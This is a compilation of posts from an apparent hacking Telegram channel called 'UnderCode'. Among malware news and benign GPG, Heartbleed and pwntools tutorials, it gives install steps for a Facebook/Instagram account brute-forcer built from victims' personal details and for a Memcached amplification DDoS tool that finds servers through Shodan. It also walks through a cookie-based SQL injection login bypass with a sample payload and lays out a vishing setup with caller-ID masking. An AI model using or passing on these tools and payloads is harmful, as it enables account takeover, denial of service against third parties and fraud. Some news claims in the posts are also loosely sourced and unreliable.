▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Android users attacked by “undeletable” virus from two days
t.me/UndercOdeTestingOfficial

>Symantec cybersecurity experts have revealed a new Xhelper virus that infects gadgets running on the Android operating system. This was reported on the android company's website(https://www.android.com)

> Due to the virus, gadgets constantly pop up ads and also reduce memory.

> It is noted that the virus enters the device along with other programs, continuing to operate when they are removed. In addition, even restoring factory settings does not allow you to get rid of malware.

> According to experts, Xhelper has already hit 45 thousand devices, most of which belong to Russians, Australians and Indians.

> On December 18, cybersecurity experts reported the discovery of a new virus that infects Android-based devices. It is known that users downloaded infected applications from the Google Play store. The malicious code is called Andr / Clickr-AD. He is able to generate a constant click on advertising links, regardless of the desire of the owner of the gadget. In this regard, the malware provokes the rapid discharge of smartphones and tablets.

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑WHAT ABOUT LASTEST VULNERABILITY ((THE MOZI)) 12/2019
Twitter.com/UndercOdeTC

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

>experts have discovered a new Mozi P2P botnet that actively brutes Netgear, D-Link and Huawei routers, checking for weak passwords via Telnet.

> Researchers discovered a botnet about four months ago and over the past time have come to the conclusion that its main target is DDoS attacks.

🦑How It Works ??

> Mozi is built using the Distributed Hash Table (DHT) protocol, which is widely used by torrent clients and other P2P platforms. This allows the botnet to work without command servers, as well as to hide the payload among normal DHT traffic. To ensure the integrity and security of the botnet components, ECDSA384 and the XOR algorithm are used.

🦑So, Mozi is able to:

> implement DDoS attacks (this module uses the code of the well-known Malvari Gafgyt, supports HTTP, TCP, UDP, and so on);

> collect and steal information about bots (bot ID, IP address, PORT, file name, gateway, processor architecture);

> execute payload from the specified URL;

> Updated through the specified URL;

> execute system or custom commands.

> The botnet also attacks dozens of different potentially vulnerable devices using known vulnerabilities: Eir D1000, Vacron NVR, devices using Realtek SDK, Netgear R7000 and R6400, MVPower DVR, Huawei HG532, D-Link gadgets, GPON routers, CCTV DVR.

@UndercOdeTestingOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑ALL Tested Ways To Hack A Facebook Account And Prevention
t.me/UnderCodeTestingOfficial

> Phishing

>Social engineering

>Easy password capture

>Keylogger

>Browser extensions cracking Facebook

>Malicious application

>Hacking software

>Malicious mobile app

>Browser vulnerabilities

>Self XSS Vulnerability

>Trojan

>Facebook Zero Day

🦑Will posts next tutorials for each way

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Facebook& instagram Hack Box full tunisian script
t.me/UndercOdeTestingOfficial

🦑Features:

1) Grab Infos From Your_Fb With Graph.fb.com

2) Auto Save Emails And Phones

3) See Trikz.txt To Know About Some Priv8 Tricks

4) Make PasswordsList With Victim's Infos + Some Math ;)

5) Brute Facebook Or Instagram's Account Directly After Making The Passwds List

6) Range List With Numbers (The Best Way if you have script Like fb.py(recoveryCode Bruter))

7) Range PhoneNumbers And Brute It Directly (Send Me Your #Country# And I Will Make It For Next Update)

8) Ofc You Need Also Some Secure Passwords To Keep Your Accounts Safely From Crackers ;)

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

For Debien Based Systems

1) sudo apt-get install git

2) git clone https://github.com/m4rktn/xsmash && cd xsmash

3) python2 xsmash.py

>For Termux

1) apt-get install python2 git

2) git clone https://github.com/m4rktn/xsmash && cd xsmash

3) python2 xsmash.py

>For Windows

1) Install Python2.7 From https://www.python.org/downloads/

2) Go To https://github.com/m4rktn/xsmash And Download In ".zip" Format

3) Extract xsmash-master.zip

4) Just Click In Xsmash.py

@ M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑A powerful and useful hacker dictionary builder for a brute-force attack
t.me/UndercOdeTestingOfficial

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone --depth=1 --branch=master https://www.github.com/landgrey/pydictor.git

2) cd pydictor/

3) chmod +x pydictor.py

4) python pydictor.py

🦑How to use ?

1) occur function

Usage : --occur [letters_occur_times_range] [digital_occur_times_range] [special_chars_occur_times_range]

Example: --occur ">=4" "<6" "==0"
types function

Usage : --types [letters_types_range] [digital_types_range] [special_types_range]

Example: --types "<=8" "<=4" "==0"
repeat function

Usage : --repeat [letters_repeat_times] [digital_repeat_times] [special_repeat_times]

Example: --repeat "<=3" ">=3" "==0"
regex function

Usage : --regex [regex]

Example: --regex "^z.*?g$"
level function

Usage : --level [level]

Example: --level 4 level >= 4 will be work in /funcfg/extend.conf
default leet table

2) leet char = replace char, and in /funcfg/leet_mode.conf

a = 4
b = 6
e = 3
l = 1
i = 1
o = 0
s = 5

3) code

0 default，replace all
1 left-to-right, replace all the first encountered leet char
2 right-to-left, replace all the first encountered leet char
11-19 left-to-right, replace the first encountered leet char to maximum code-10 chars
21-29 right-to-left, replace the first encountered leet char to maximum code-20 chars

🦑function code
function code description
len F1 the scope of length
head F2 add items prefix
tail F3 add items suffix
encode F4 encode the items
occur F5 filter by occur times of letter、digital、special chars
types F6 filter by types of letter、digital、special chars
regex F7 filter by regex
level F8 set the word list rule level
leet F9 enable 1337 mode
repeat F10 filter by consecutive repeat times of letter、digital、special chars
@ M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2019 lastest
Your Social Engineering Sidekick for KALI/ubanto Os
twitter.com/UndercOdeTC

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) clone https://github.com/tevora-threat/Dragnet

git clone this repo to your development machine

2) Initial Firebase Setup

3) Create a Firebase account if you don't already have one

4) Create a new project in Firebase

5) Upgrade the project to the Blaze plan

6) Choose "Cloud Firestore" as your database

7) Make sure that Firestore Database rules are as follows:
service cloud.firestore { match /databases/{database}/documents { match /{document=} { allow read, write : if request.auth != null; } } }

8) Make sure that Firebase Storage rules are as follows:
service firebase.storage { match /b/{bucket}/o { match /{allPaths=} {

> allow read, write: if request.auth != null; } } }

> Head to Authentication > Sign-In Method, and enable the Email method

9) Create an account for yourself with a NON-TEMPORARY EMAIL

10 )Initial VoIP Setup

11) Choose a SIP Trunk provider that allows masking (VoIP.ms is used in this documentation)

12) Purchase a DID number and some minutes

13) Take proper precautions to harden this account
Initial Admin Server Setup

14) Spin up a new cloud VM running Ubuntu 18.04
(You should be good with 4 GB Memory)

15) Get Asterisk 15 installed
(Here's a good starting point)

16) Get Node 8.x installed

> curl -sL https://deb.nodesource.com/setup_8.x | sudo -E bash -
>sudo apt-get install -y nodejs

17)(Get set up for headless browsing

>sudo apt-get install -y xvfb x11-xkb-utils xfonts-100dpi xfonts-75dpi xfonts-scalable xfonts-cyrillic x11-apps clang libdbus-1-dev libgtk2.0-dev libnotify-dev libgconf2-dev libasound2-dev libcap-dev libcups2-dev libxtst-dev libxss1 libnss3-dev gcc-multilib g++-multilib

18) git clone the Dragnet repo onto this cloud VM
cp / mv the contents of the repo's "admin" folder so that your file structure is as follows:

> Edit the contents of asterisk/sip.conf with your new SIP Trunk account info

>cp asterisk/sip.conf asterisk/extensions.conf /etc/asterisk/.

>Edit the contents of ~/ak/logUrl.txt with your Firebase details

>Edit the contents of endpoint/endpoint.js, replacing the following:

domain: the domain name you set up during set 6 (4.6) above
authPass: a strong password for use with Basic Auth
authUser: a username for use with Basic Auth
storageBucketUrl: the url of your Firebase storage bucket

🦑NOW TYPE

>mkdir /endpoint/ak && mkdir /osint/ak && touch /endpoint/ak/ServiceAccountKey.json

>ServiceAccountKey.json (created above) should contain the contents downloaded from:

https://console.firebase.google.com/project/CHANGEME/settings/serviceaccounts/adminsdk

>cp ~/endpoint/ak/ServiceAccountKey.json ~/osint/ak/.

>npm install in ~/endpoint/and ~/osint/

🦑from Terminal , start each of these in a seperate screen:

> sudo asterisk && sudo asterisk -rvvvvv

>then, in the asterisk console:
sip reload

dialplan reload

>nodemon ./endpoint/endpoint.js

🦑Final development machine setup

>firebase deploy --only functions from the functions directory on your development machine

>If all went well, you can now npm run dev from your development machine where you git cloned the project initially. Then log in and get started!
enjoy with UndercOde

Written by UnderCodeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Bypassing MSI installer checks
how to bypass certain checks that MSI installers can do.

for one having two factor authentication on Windows 8 Enterprise edition, using a token.
t.me/UndercOdeTestingOfficial

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

1) Required Tools
- http://www.instedit.com/ - An MSI Install Editor (A nice alternative for Microsoft Orca)

2) Edit the MSI Installer

> Open InstEd It! and open the required MSI file. Go to the table “InstallExecuteSequence”.

3) Here you’ll see an action called “LaunchConditions”.

> In the next table, called “InstallUIConditions” you will see the same action called “LaunchConditions”.

4) now look at the action in table “LaunchConditions”.

5) In the condition row, you can see the value “Installed or (MsiNTPersonal = 1)”, changing this value to 0 will install only on non Windows Home editions, not the best if we want this software to be available on any edition of Windows.

6) To make this work on all editions of Windows 7/8, remove the action “LaunchConditions” in the tables:

> InstallExecuteSequence

> InstallUIConditions

7) Finally, save the MSI file, launch it and have fun!

@UnderCodeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Cookies exact Explication bu UndercOde
instagram.com/UndercOdeTestingCompany

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

What is Cookie ?

>A cookie, also known as an HTTP cookie, web cookie, or browser cookie, is used for an origin website to send state information to a user’s browser and for the browser to return the state information to the origin site. The state information can be used for authentication, identification of a user session, user’s preferences, shopping cart contents, or anything else that can be accomplished through storing text data.

>Cookies are not software. They cannot be programmed, cannot carry viruses, and cannot install malware on the host computer. However, they can be used by spyware to track user’s browsing activities – a major privacy concern that prompted European and US law makers to take action. Cookies could also be stolen by hackers to gain access to a victim’s web account.

🦑Where can i find my Cookie ?
Here is one way to get your stored cookies using your browser. This method is applied for Mozilla FireFox:

> 1. From the Tools menu, select Options. If the menu bar is hidden, press Alt to make it visible.

2. At the top of the window that appears, click Privacy.

3. To modify settings, from the drop-down menu under “History”, select Use custom settings for history. Then enable or disable the settings by checking or unchecking the boxes next to each setting:

*To allow sites to set cookies on your computer, select Accept cookies from sites. To specify which sites are always or never allowed to use cookies, click "Exceptions".

🦑Why Cookies always not safe ?

> Are you talking about Cookie Poisoning-like attack ?

1) Cookie Poisoning attacks involve the modification of the contents of a cookie (personal information stored in a Web user’s computer) in order to bypass security mechanisms.

2) Using cookie poisoning attacks, attackers can gain unauthorized information about another user and steal their identity.

3) Cookie poisoning is a known technique mainly for achieving impersonation and breach of privacy through manipulation of session cookies, which maintain the identity of the client. By forging these cookies, an attacker can impersonate a valid client, and thus gain information and perform actions on behalf of the victim. The ability to forge such session cookies (or more generally, session tokens) stems from the fact that the tokens are not generated in a secure way.

4) To sum up, cookie-based SQL Injection is far to be a kind of Cookie Poisoning.

@UnderCodeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Cookie-Based SQL Injection by UndercOde
t.me/UnderCodeTestingOfficial

🦑Injecting malicious code in Cookie


> Unlike other parameters, cookies are not supposed to be handled by users.
> Outside of session cookies which are (usually) random, cookies may contain data in clear or encoded in hexadecimal, base64, hashes (MD5, SHA1), serialized information. If we can determine the encoding used, we will attempt to inject SQL commands.

🦑

function is_user($user) {
global $prefix, $db, $user_prefix;
if(!is_array($user)) {

$user = base64_decode($user);
$user = explode(“:”, $user);
$uid = “$user[0]”;
$pwd = “$user[2]”;
} else {
$uid = “$user[0]”;
$pwd = “$user[2]”;
}
if ($uid != “” AND $pwd != “”) {

$sql = “SELECT user_password FROM “.$user_prefix.”_users WHERE user_id=’$uid'”;
$result = $db->sql_query($sql);
$row = $db->sql_fetchrow($result);
$pass = $row[user_password];
if($pass == $pwd && $pass != “”) {
return 1;
}
}
return 0;
}


🦑The cookie contains base64 encoded form identifier, a field that is unknown and a password. If we use as a cookie 12345 ‘UNION SELECT’ mypass ‘:: mypass base64 encoded, the SQL query becomes:

>SELECT user_password FROM nk_users WHERE user_id=’12345′ UNION
>SELECT ‘mypass’

>This query returns the password mypass, the same password as we have to provide. So we are connected.

🦑How to inject the codes in Cookies ?

1) There are many HTTP interceptors and HTTP editors that can intercept the HTTP request before it is sent to the server.
Then the tester can introduce his malicious SQL statement in the cookie field.

2) It’s like a get/post based SQL Injection, except that certain characters can’t be used.

> For example, ‘;‘ and ‘,‘ are typically treated as delimiters, so they end the injection if they aren’t URL-encoded.

Written by UndercOde

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Limitations of Web Application Vulnerability Scanners:
Why Not safe ??
t.me/iOsDeveloppers

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

1) Web application vulnerability scanners are not always capable of detecting all of the vulnerabilities and attack vectors that exist.

2) In consequence, they may assert numerous false-negatives and false-positives. These were some of the results of a study named: “Closing the Gap: Analyzing the Limitations of Web Application Vulnerability Scanners” hold during the OWASP APPSEC DC 2010. The tests were based on many professional scanners: Burp suite professional, Acunetix, Wapiti, Grendel-Scan, W3af, N-Stalker, CENZIC, netsparker.

3) As far as cookie variable’s injection is concerned, only 6,3% of the web application Vulnerability scanners had detected the implemented SQL injection vulnerabilities.

4) This rate looks like emphasize that the cookie vector is neglected when testing against SQL injections. Also, it’s very low comparing to percentage of the detection of SQL injection in Form Inputs (59,7%)

@ UndercOde

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑EXPLOITATION :
What is VBA?


1) VBA (Visual Basic for Applications) is a programming language used mostly in Microsoft’s office.
VBA is, however, also used in AutoCAD for plugins etc.

2) VBA’s syntax is rather much identical to Visual Basic, there are just

3) some API calls ready to be used to communicate back to the main application.

4) Initially VBA had been released to replace WordBasic as a “micro language”.

5) Just like Visual Basic, VBA is a so-called Object-Oriented programming language.

6) VBA does have it’s limitations, though, it still requires the main application to function as it can not be written to be a stand-alone application, which Visual Basic can do.

7) The close relation between VBA and the main application’s core creates a big point of interest for virus', exploiters and malware, as these can all abuse the wide variety of options available to them thanks to VBA.

t.me/UNDERCODETESTINGOFFICIAL

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑For EXPERT HACKERS :
How to use GPG Any beb base Linux distro (for termux have to download & unzip manual)
T.me/UndercOdeTestingOfficial


What is GPG?

> GNU Privacy Guard (GnuPG), also known as GPG, is a tool for secure communication that was created as Free Software under the GNU Project. GnuPG follows the OpenPGP protocol, which defines and standardizes all the necessary components involved in sending encrypted messages–signatures, private keys, and public key certificates

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

1) sudo apt update

2) sudo apt install gnupg

3) gpg --full-generate-key

4) Prompts will ask details about the key you are generating. Our recommendations are:

* Select (1) RSA and RSA (default) for the type of key

* Enter 4096 for the key size

* Enter 1y for the expiration date. You may choose a different expiration
(depend on duration)

* Enter a relevent name, email and comment. These will be used later to identify the keypair

* Give your key a good passphrase. This passphrase is the only thing that protects your private key if someone else gets hold of it.

5) Congratulations you should have a smoking hot new GPG key. You can list all the keys in your public keyring by typing:

> gpg --list-keys

6) You should be able to see your newly created user id in the list. This may be the only key in your keyring but as you add other peoples keys the list will grow.

7) Encrypting and decrypting messages

> gpg --armor --output file.asc --encrypt --recipient <email> <file>

> gpg --output file.txt --decrypt file.asc

8) If you have multiple private keys on your machine it will automatically determine the correct key and prompt you for the passphrase. Enter the passphrase correctly and a new file file.txt will be created containing the original content.

9) Message verification
GPG can digitally sign a document to verify its authenticity and integrity. A recipient can inspect the signature and confirm that it does come from the expected sender and that the content has been unmodified.

>gpg --armor --output signedfile.asc --sign <file>

10) Once the recipient has recieved the file they can verify the signature and extra the content:

> gpg --verify signedfile.asc
If the signature is valid it will output details about the signature including when and by whom it was signed

🦑NOW Exchanging public keys

1) Export your public key
The simplest way to share your key is to export it as an ASCII armoured file and send it to whomever you want to recieve messages from. This file can be emailed or shared online.

> gpg --armor --output public.asc --export <email>

2) Import and validate public key
You can then import the public key into your keyring by:

> gpg --import public.asc

3) Submit your public key to a key server
A more convenient way is to upload it to a public keyserver. Key servers are…

> MIT hosts a popular keyserver: https://pgp.mit.edu

4) Find the key ID for the public key you want to upload
gpg --list-keys <email>

5) You will see a long HEX value in the pub row, this is the ID for this public key.

1) Upload your key to a keyserver:

2) gpg --send-keys <key id>

3) Retrieve a public key

4) Find the key ID for the public key you want to download
gpg --search <name>

5) Download key
gpg --recv-key <key id>

6) When adding a new key to your public keystore it is of little use until you verify it is the correct key TODO

7) Revoking keys

8) To delete a key from your keychain you can do:

> gpg --delete-key <key id>
If this a key you hold the private key to you will first need to delete the screts for the key:

gpg --delete-secret-key <key id>

Written by @UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑CTF framework and exploit development library
>Most functionality should work on any Posix-like distribution (Debian, Arch, FreeBSD, OSX, etc.). Python >= 2.7 is required Python 3
t.me/UndercOdeTestingOfficial

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) apt-get update

2) apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev

3) build-essential

4) python3 -m pip install --upgrade pip

5) python3 -m pip install --upgrade git+https://github.com/Gallopsled/pwntools.git@dev3

🦑Tested by undercOde on :

> kali
>ubanto

@ M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑What was the Heartbleed Bug?
instagram.com/UndercOdeTestingCompany

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

> Impact of the Vulnerability

> This vulnerability allows an attacker to extract memory contents from the webserver through the vulnerability in the heartbeat.

> As a result an attacker may be able to access sensitive information such as the private keys used for SSL/TLS.

1) Active Attack - Equipped with the private key, an attacker can silently monitor and decrypt communications between the user and the web server. As a result, an attacker could view private data such as passwords, credit card data, medical records and any other sensitive data the user exchanges with the website. In addition, the attacker could impersonate the target website to deliver fake, inaccurate or malicious data to the user.

2) Offline Attack - Some well funded attackers gather large amounts of encrypted data and store this data in the event they can later decrypt the information. Using the Heartbleed vulnerability the attackers could decrypt this information if it was obtained when passed between a user and a vulnerable website. This means that sensitive data exchanged up to two years ago could also now be at risk for exposure to attackers. Note: sites implementing Perfect Forward Secrecy are protected against this particular attack.

3) Scope - 1.0.1 and 1.0.2-beta releases of OpenSSL are affected including 1.0.1f and 1.0.2-beta1. Apache, which uses OpenSSL for HTTPS, is used by 66% of all websites according to netcraft.com. A study of the TLS heartbeat extension by Netcraft also identified that 17.5% of SSL sites may be vulnerable to the Heartbleed bug.


🦑The Fix
The patch in OpenSSL 1.0.1g is essentially a bounds check, using the correct record length in the SSL3 structure (s3->rrec) that described the incoming HeartbeatMessage.

Below is the revised code from Github.[8]

hbtype = *p++;
n2s(p, payload);
if (1 + 2 + payload + 16 > s->s3->rrec.length)
return 0; /* silently discard per RFC 6520 sec. 4 */
pl = p;


🦑Verify if you are using a vulnerable version of OpenSSL.

1) Upgrade OpenSSL as soon as possible. OpenSSL was released on (https://www.openssl.org/source/).

2) Reissue your security certificates for SSL/TLS. The vulnerability has been present for two years and there is no way to verify if your private key has been compromised as a result of this vulnerability.

3) In addition, a compromised key would be used to silently monitor communications from your users and the attack would be undetectable. It is prudent to assume a breach and proactively reissue security certificates.

@ M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Termux Backup restore 2019 Tool
t.me/UndercOdeTestingOfficial


🦑Termux Backup :

From this option you can backup all the tools and default bash terminal script into your internal stoarge without any issue and you can restore it at any time.

> Termuc Restore :

From this option you can restore the backup tools of termux and default terminal as it was first.

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

$ apt-get update -y
$ apt-get upgrade -y
$ pkg install python -y
$ pkg install python2 -y
$ pkg install git -y
$ pip install lolcat
$ git clone https://github.com/noob-hackers/snap
$ ls
$ cd snap
$ ls
$ bash snap.sh

@ M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Happy New Year all 😊We have some great tutorials for next year

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Termux DDoS attack tool for sending forged UDP packets to vulnerable Memcached servers obtained using Shodan API
t.me/UndercOdeTestingOfficial

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) apt-get install python3

2) pip install scapy

3) pip install shodan

4) now You may obtain one for free in Shodan if you sign up using a .edu email
> https://shodan.io/

5) git clone https://github.com/649/Memcrashed-DDoS-Exploit.git

6) cd Memcrashed-DDoS-Exploit

7) echo "SHODAN_KEY" > api.txt

8) docker build -t memcrashed .

9) docker run -it memcrashed

@ M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁